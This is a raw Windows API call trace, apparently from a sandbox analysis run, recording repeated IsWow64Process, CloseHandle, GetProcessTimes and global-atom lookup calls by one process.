	[0124.533] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.533] CloseHandle (hObject=0x69c) returned 1
	[0124.534] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.534] CloseHandle (hObject=0x69c) returned 1
	[0124.534] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.534] CloseHandle (hObject=0x69c) returned 1
	[0124.534] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.534] CloseHandle (hObject=0x69c) returned 1
	[0124.534] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.534] CloseHandle (hObject=0x69c) returned 1
	[0124.535] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.535] CloseHandle (hObject=0x69c) returned 1
	[0124.535] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.535] CloseHandle (hObject=0x69c) returned 1
	[0124.535] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.535] CloseHandle (hObject=0x69c) returned 1
	[0124.535] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.535] CloseHandle (hObject=0x69c) returned 1
	[0124.535] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.535] CloseHandle (hObject=0x69c) returned 1
	[0124.536] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.536] CloseHandle (hObject=0x69c) returned 1
	[0124.536] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.536] CloseHandle (hObject=0x69c) returned 1
	[0124.536] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.536] CloseHandle (hObject=0x69c) returned 1
	[0124.536] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.536] CloseHandle (hObject=0x69c) returned 1
	[0124.537] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.537] CloseHandle (hObject=0x69c) returned 1
	[0124.537] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.537] CloseHandle (hObject=0x69c) returned 1
	[0124.537] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.537] CloseHandle (hObject=0x69c) returned 1
	[0124.537] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.537] CloseHandle (hObject=0x69c) returned 1
	[0124.537] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.538] CloseHandle (hObject=0x69c) returned 1
	[0124.538] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.538] CloseHandle (hObject=0x69c) returned 1
	[0124.538] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.538] CloseHandle (hObject=0x69c) returned 1
	[0124.538] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.538] CloseHandle (hObject=0x69c) returned 1
	[0124.538] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.538] CloseHandle (hObject=0x69c) returned 1
	[0124.539] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.539] CloseHandle (hObject=0x69c) returned 1
	[0124.539] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.539] CloseHandle (hObject=0x69c) returned 1
	[0124.539] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.539] CloseHandle (hObject=0x69c) returned 1
	[0124.539] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.539] CloseHandle (hObject=0x69c) returned 1
	[0124.539] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.539] CloseHandle (hObject=0x69c) returned 1
	[0124.540] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.541] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.541] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.541] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.541] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.541] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.542] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.542] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.542] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.542] CloseHandle (hObject=0x69c) returned 1
	[0124.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.542] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.542] CloseHandle (hObject=0x69c) returned 1
	[0124.542] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.542] CloseHandle (hObject=0x69c) returned 1
	[0124.543] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.543] CloseHandle (hObject=0x69c) returned 1
	[0124.543] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.543] CloseHandle (hObject=0x69c) returned 1
	[0124.543] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.543] CloseHandle (hObject=0x69c) returned 1
	[0124.576] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.576] CloseHandle (hObject=0x69c) returned 1
	[0124.576] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.576] CloseHandle (hObject=0x69c) returned 1
	[0124.576] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.576] CloseHandle (hObject=0x69c) returned 1
	[0124.576] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.576] CloseHandle (hObject=0x69c) returned 1
	[0124.576] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.577] CloseHandle (hObject=0x69c) returned 1
	[0124.577] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.577] CloseHandle (hObject=0x69c) returned 1
	[0124.577] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.577] CloseHandle (hObject=0x69c) returned 1
	[0124.577] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.577] CloseHandle (hObject=0x69c) returned 1
	[0124.577] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.577] CloseHandle (hObject=0x69c) returned 1
	[0124.578] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.578] CloseHandle (hObject=0x69c) returned 1
	[0124.578] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.578] CloseHandle (hObject=0x69c) returned 1
	[0124.578] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.578] CloseHandle (hObject=0x69c) returned 1
	[0124.578] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.578] CloseHandle (hObject=0x69c) returned 1
	[0124.579] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.579] CloseHandle (hObject=0x69c) returned 1
	[0124.579] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.579] CloseHandle (hObject=0x69c) returned 1
	[0124.579] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.579] CloseHandle (hObject=0x69c) returned 1
	[0124.579] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.579] CloseHandle (hObject=0x69c) returned 1
	[0124.579] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.580] CloseHandle (hObject=0x69c) returned 1
	[0124.580] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.580] CloseHandle (hObject=0x69c) returned 1
	[0124.580] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.580] CloseHandle (hObject=0x69c) returned 1
	[0124.580] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.581] CloseHandle (hObject=0x69c) returned 1
	[0124.581] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.581] CloseHandle (hObject=0x69c) returned 1
	[0124.581] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.581] CloseHandle (hObject=0x69c) returned 1
	[0124.581] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.581] CloseHandle (hObject=0x69c) returned 1
	[0124.581] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.581] CloseHandle (hObject=0x69c) returned 1
	[0124.582] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.582] CloseHandle (hObject=0x69c) returned 1
	[0124.582] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.582] CloseHandle (hObject=0x69c) returned 1
	[0124.582] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.582] CloseHandle (hObject=0x69c) returned 1
	[0124.582] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.583] CloseHandle (hObject=0x69c) returned 1
	[0124.583] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.583] CloseHandle (hObject=0x69c) returned 1
	[0124.583] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.583] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.583] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.584] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.584] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.584] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.584] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.584] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.584] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.585] CloseHandle (hObject=0x69c) returned 1
	[0124.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.585] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.585] CloseHandle (hObject=0x69c) returned 1
	[0124.585] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.585] CloseHandle (hObject=0x69c) returned 1
	[0124.585] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.585] CloseHandle (hObject=0x69c) returned 1
	[0124.585] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.585] CloseHandle (hObject=0x69c) returned 1
	[0124.586] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.586] CloseHandle (hObject=0x69c) returned 1
	[0124.618] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.618] CloseHandle (hObject=0x69c) returned 1
	[0124.618] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.618] CloseHandle (hObject=0x69c) returned 1
	[0124.618] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.618] CloseHandle (hObject=0x69c) returned 1
	[0124.619] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.619] CloseHandle (hObject=0x69c) returned 1
	[0124.619] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.619] CloseHandle (hObject=0x69c) returned 1
	[0124.619] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.619] CloseHandle (hObject=0x69c) returned 1
	[0124.619] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.619] CloseHandle (hObject=0x69c) returned 1
	[0124.620] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.620] CloseHandle (hObject=0x69c) returned 1
	[0124.620] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.620] CloseHandle (hObject=0x69c) returned 1
	[0124.620] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.620] CloseHandle (hObject=0x69c) returned 1
	[0124.621] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.621] CloseHandle (hObject=0x69c) returned 1
	[0124.621] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.621] CloseHandle (hObject=0x69c) returned 1
	[0124.621] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.621] CloseHandle (hObject=0x69c) returned 1
	[0124.621] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.621] CloseHandle (hObject=0x69c) returned 1
	[0124.622] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.622] CloseHandle (hObject=0x69c) returned 1
	[0124.622] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.622] CloseHandle (hObject=0x69c) returned 1
	[0124.622] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.622] CloseHandle (hObject=0x69c) returned 1
	[0124.622] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.622] CloseHandle (hObject=0x69c) returned 1
	[0124.623] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.623] CloseHandle (hObject=0x69c) returned 1
	[0124.623] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.623] CloseHandle (hObject=0x69c) returned 1
	[0124.623] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.623] CloseHandle (hObject=0x69c) returned 1
	[0124.623] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.623] CloseHandle (hObject=0x69c) returned 1
	[0124.623] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.624] CloseHandle (hObject=0x69c) returned 1
	[0124.624] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.624] CloseHandle (hObject=0x69c) returned 1
	[0124.624] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.624] CloseHandle (hObject=0x69c) returned 1
	[0124.624] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.624] CloseHandle (hObject=0x69c) returned 1
	[0124.625] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.625] CloseHandle (hObject=0x69c) returned 1
	[0124.625] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.625] CloseHandle (hObject=0x69c) returned 1
	[0124.625] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.625] CloseHandle (hObject=0x69c) returned 1
	[0124.625] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.625] CloseHandle (hObject=0x69c) returned 1
	[0124.626] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.626] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.626] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.626] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.626] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.627] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.627] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.627] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.627] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.627] CloseHandle (hObject=0x69c) returned 1
	[0124.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.627] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.627] CloseHandle (hObject=0x69c) returned 1
	[0124.627] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.627] CloseHandle (hObject=0x69c) returned 1
	[0124.628] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.628] CloseHandle (hObject=0x69c) returned 1
	[0124.628] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.628] CloseHandle (hObject=0x69c) returned 1
	[0124.628] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.628] CloseHandle (hObject=0x69c) returned 1
	[0124.661] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.661] CloseHandle (hObject=0x69c) returned 1
	[0124.661] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.661] CloseHandle (hObject=0x69c) returned 1
	[0124.661] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.661] CloseHandle (hObject=0x69c) returned 1
	[0124.661] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.661] CloseHandle (hObject=0x69c) returned 1
	[0124.661] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.661] CloseHandle (hObject=0x69c) returned 1
	[0124.662] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.662] CloseHandle (hObject=0x69c) returned 1
	[0124.662] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.662] CloseHandle (hObject=0x69c) returned 1
	[0124.662] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.662] CloseHandle (hObject=0x69c) returned 1
	[0124.662] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.662] CloseHandle (hObject=0x69c) returned 1
	[0124.662] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.663] CloseHandle (hObject=0x69c) returned 1
	[0124.663] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.663] CloseHandle (hObject=0x69c) returned 1
	[0124.663] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.663] CloseHandle (hObject=0x69c) returned 1
	[0124.663] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.663] CloseHandle (hObject=0x69c) returned 1
	[0124.663] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.663] CloseHandle (hObject=0x69c) returned 1
	[0124.664] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.664] CloseHandle (hObject=0x69c) returned 1
	[0124.664] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.664] CloseHandle (hObject=0x69c) returned 1
	[0124.664] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.664] CloseHandle (hObject=0x69c) returned 1
	[0124.664] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.664] CloseHandle (hObject=0x69c) returned 1
	[0124.664] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.664] CloseHandle (hObject=0x69c) returned 1
	[0124.665] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.665] CloseHandle (hObject=0x69c) returned 1
	[0124.665] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.665] CloseHandle (hObject=0x69c) returned 1
	[0124.665] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.665] CloseHandle (hObject=0x69c) returned 1
	[0124.665] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.665] CloseHandle (hObject=0x69c) returned 1
	[0124.665] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.665] CloseHandle (hObject=0x69c) returned 1
	[0124.666] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.666] CloseHandle (hObject=0x69c) returned 1
	[0124.666] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.666] CloseHandle (hObject=0x69c) returned 1
	[0124.666] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.667] CloseHandle (hObject=0x69c) returned 1
	[0124.667] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.667] CloseHandle (hObject=0x69c) returned 1
	[0124.667] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.667] CloseHandle (hObject=0x69c) returned 1
	[0124.667] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.667] CloseHandle (hObject=0x69c) returned 1
	[0124.667] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.668] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.668] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.668] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.668] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.668] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.669] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.669] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.669] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.669] CloseHandle (hObject=0x69c) returned 1
	[0124.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.669] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.669] CloseHandle (hObject=0x69c) returned 1
	[0124.669] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.669] CloseHandle (hObject=0x69c) returned 1
	[0124.670] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.670] CloseHandle (hObject=0x69c) returned 1
	[0124.670] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.670] CloseHandle (hObject=0x69c) returned 1
	[0124.670] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.670] CloseHandle (hObject=0x69c) returned 1
